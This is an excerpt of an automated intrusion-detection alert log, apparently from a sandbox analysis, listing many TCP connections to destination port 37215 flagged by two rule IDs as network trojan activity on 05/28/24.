          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147471
          SID:2829579
          Source Port:38006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772780
          SID:2835222
          Source Port:40336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147777
          SID:2835222
          Source Port:52970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195400
          SID:2829579
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136030
          SID:2829579
          Source Port:42674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542355
          SID:2829579
          Source Port:34708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422853
          SID:2829579
          Source Port:54332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426502
          SID:2829579
          Source Port:51212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283499
          SID:2829579
          Source Port:45150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176452
          SID:2835222
          Source Port:41572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.420549
          SID:2835222
          Source Port:47476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803354
          SID:2829579
          Source Port:38640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156163
          SID:2829579
          Source Port:44254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267288
          SID:2829579
          Source Port:51356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272020
          SID:2835222
          Source Port:56616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.875972
          SID:2835222
          Source Port:36564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.620380
          SID:2835222
          Source Port:42560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273231
          SID:2835222
          Source Port:49730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549525
          SID:2835222
          Source Port:58596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112149
          SID:2835222
          Source Port:42636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767077
          SID:2829579
          Source Port:54076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839407
          SID:2835222
          Source Port:32880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201937
          SID:2829579
          Source Port:37624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685934
          SID:2835222
          Source Port:52462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051058
          SID:2835222
          Source Port:34058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.923873
          SID:2829579
          Source Port:47338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154061
          SID:2835222
          Source Port:52740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551314
          SID:2829579
          Source Port:37366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795118
          SID:2835222
          Source Port:47054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143081
          SID:2835222
          Source Port:47904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281625
          SID:2829579
          Source Port:45718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.752850
          SID:2835222
          Source Port:47312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528867
          SID:2835222
          Source Port:39006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664118
          SID:2829579
          Source Port:38466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.866770
          SID:2835222
          Source Port:58542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739472
          SID:2829579
          Source Port:40454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845835
          SID:2829579
          Source Port:59472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.614044
          SID:2835222
          Source Port:42388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819778
          SID:2835222
          Source Port:36248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711441
          SID:2835222
          Source Port:56598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147614
          SID:2835222
          Source Port:49582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272285
          SID:2835222
          Source Port:47538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.319012
          SID:2835222
          Source Port:55246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146063
          SID:2835222
          Source Port:33122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.305227
          SID:2835222
          Source Port:47046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941455
          SID:2829579
          Source Port:56356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.808042
          SID:2829579
          Source Port:56982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681486
          SID:2829579
          Source Port:48364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498166
          SID:2829579
          Source Port:57716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764028
          SID:2835222
          Source Port:55302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542672
          SID:2829579
          Source Port:38804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635149
          SID:2829579
          Source Port:40376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.672182
          SID:2835222
          Source Port:57764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810573
          SID:2835222
          Source Port:56590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472230
          SID:2835222
          Source Port:57354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.811791
          SID:2829579
          Source Port:50090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.848639
          SID:2829579
          Source Port:48590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142588
          SID:2829579
          Source Port:54756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325307
          SID:2829579
          Source Port:60700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698548
          SID:2829579
          Source Port:32880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939359
          SID:2829579
          Source Port:48232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.280961
          SID:2835222
          Source Port:35524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089568
          SID:2835222
          Source Port:33440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.214095
          SID:2835222
          Source Port:52564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.972182
          SID:2829579
          Source Port:43192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138146
          SID:2835222
          Source Port:43218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298100
          SID:2829579
          Source Port:55276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.773816
          SID:2829579
          Source Port:60018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741460
          SID:2835222
          Source Port:45158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204799
          SID:2829579
          Source Port:43916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.292952
          SID:2835222
          Source Port:34132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795939
          SID:2829579
          Source Port:48874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.249090
          SID:2835222
          Source Port:60712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402461
          SID:2835222
          Source Port:48502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793237
          SID:2835222
          Source Port:33534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989515
          SID:2835222
          Source Port:57828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733102
          SID:2835222
          Source Port:44774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.746031
          SID:2829579
          Source Port:48584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803238
          SID:2835222
          Source Port:58520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744889
          SID:2835222
          Source Port:44010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893335
          SID:2829579
          Source Port:45014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680171
          SID:2835222
          Source Port:39272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183075
          SID:2829579
          Source Port:44230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680329
          SID:2835222
          Source Port:42054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214712
          SID:2835222
          Source Port:41494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.373297
          SID:2835222
          Source Port:51962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464026
          SID:2835222
          Source Port:51238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878020
          SID:2829579
          Source Port:53466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325813
          SID:2835222
          Source Port:41200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350485
          SID:2835222
          Source Port:60328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266893
          SID:2835222
          Source Port:54790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.933460
          SID:2835222
          Source Port:46442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768748
          SID:2835222
          Source Port:43748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.019408
          SID:2835222
          Source Port:52864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492675
          SID:2829579
          Source Port:38574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711380
          SID:2835222
          Source Port:53756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.047823
          SID:2835222
          Source Port:45070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.890365
          SID:2835222
          Source Port:37872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147924
          SID:2829579
          Source Port:58788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.610480
          SID:2829579
          Source Port:56854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206975
          SID:2829579
          Source Port:40504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190686
          SID:2835222
          Source Port:55858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161800
          SID:2835222
          Source Port:47594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178965
          SID:2829579
          Source Port:47610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858861
          SID:2829579
          Source Port:57514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.025709
          SID:2835222
          Source Port:38908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.600879
          SID:2835222
          Source Port:32974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.182244
          SID:2835222
          Source Port:56588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962298
          SID:2835222
          Source Port:46800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239159
          SID:2829579
          Source Port:41238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151888
          SID:2829579
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022397
          SID:2829579
          Source Port:51528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681193
          SID:2829579
          Source Port:58880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473355
          SID:2829579
          Source Port:33354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944885
          SID:2829579
          Source Port:55726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403246
          SID:2829579
          Source Port:53126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.615349
          SID:2835222
          Source Port:44292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.986231
          SID:2835222
          Source Port:55676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.675367
          SID:2835222
          Source Port:60132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293111
          SID:2829579
          Source Port:52570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885946
          SID:2835222
          Source Port:59888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269338
          SID:2835222
          Source Port:60582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272299
          SID:2829579
          Source Port:47922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102832
          SID:2835222
          Source Port:56740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271862
          SID:2835222
          Source Port:38026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.081449
          SID:2835222
          Source Port:58520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191915
          SID:2829579
          Source Port:36398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.176420
          SID:2835222
          Source Port:43020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083788
          SID:2835222
          Source Port:53860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.107354
          SID:2829579
          Source Port:40912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215279
          SID:2829579
          Source Port:59492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.848204
          SID:2829579
          Source Port:47960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153846
          SID:2835222
          Source Port:56900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147268
          SID:2835222
          Source Port:39948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.994898
          SID:2835222
          Source Port:53450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178983
          SID:2829579
          Source Port:58530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976634
          SID:2829579
          Source Port:47038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021426
          SID:2829579
          Source Port:33890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485410
          SID:2829579
          Source Port:35670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045896
          SID:2835222
          Source Port:45746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795227
          SID:2835222
          Source Port:48358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921192
          SID:2829579
          Source Port:36882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102814
          SID:2829579
          Source Port:32960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497222
          SID:2829579
          Source Port:55464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339225
          SID:2829579
          Source Port:34134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.909164
          SID:2835222
          Source Port:50598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065544
          SID:2835222
          Source Port:40400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044542
          SID:2835222
          Source Port:41056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067548
          SID:2835222
          Source Port:51718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090662
          SID:2829579
          Source Port:51706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684694
          SID:2829579
          Source Port:40926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817705
          SID:2835222
          Source Port:58442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538828
          SID:2829579
          Source Port:39802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488283
          SID:2835222
          Source Port:60166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767359
          SID:2835222
          Source Port:51874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542314
          SID:2829579
          Source Port:57458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042399
          SID:2835222
          Source Port:58616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552305
          SID:2835222
          Source Port:53738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.151094
          SID:2829579
          Source Port:39424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.300889
          SID:2835222
          Source Port:58254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325376
          SID:2835222
          Source Port:56162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839938
          SID:2835222
          Source Port:36246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849176
          SID:2829579
          Source Port:40362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093714
          SID:2835222
          Source Port:38364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809026
          SID:2829579
          Source Port:35964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962885
          SID:2829579
          Source Port:44256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299345
          SID:2829579
          Source Port:41358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338660
          SID:2835222
          Source Port:60128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298808
          SID:2829579
          Source Port:51642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.717991
          SID:2835222
          Source Port:46144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510328
          SID:2829579
          Source Port:33804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938403
          SID:2835222
          Source Port:46802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291531
          SID:2835222
          Source Port:50438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804549
          SID:2829579
          Source Port:55682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.499733
          SID:2835222
          Source Port:50314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239424
          SID:2835222
          Source Port:55088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755967
          SID:2829579
          Source Port:45394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529971
          SID:2835222
          Source Port:38078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.184063
          SID:2829579
          Source Port:51002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.848642
          SID:2835222
          Source Port:57854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.865010
          SID:2829579
          Source Port:46550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666207
          SID:2835222
          Source Port:37652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892538
          SID:2835222
          Source Port:57182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.689908
          SID:2835222
          Source Port:44878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.220918
          SID:2829579
          Source Port:42768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322838
          SID:2835222
          Source Port:58688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063131
          SID:2835222
          Source Port:35696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938435
          SID:2829579
          Source Port:55170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.660319
          SID:2835222
          Source Port:35820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930850
          SID:2835222
          Source Port:42800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.768834
          SID:2829579
          Source Port:53848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301328
          SID:2829579
          Source Port:60364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.616977
          SID:2829579
          Source Port:42308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.734734
          SID:2835222
          Source Port:35490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008839
          SID:2835222
          Source Port:45420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547734
          SID:2829579
          Source Port:41208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182995
          SID:2835222
          Source Port:38022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
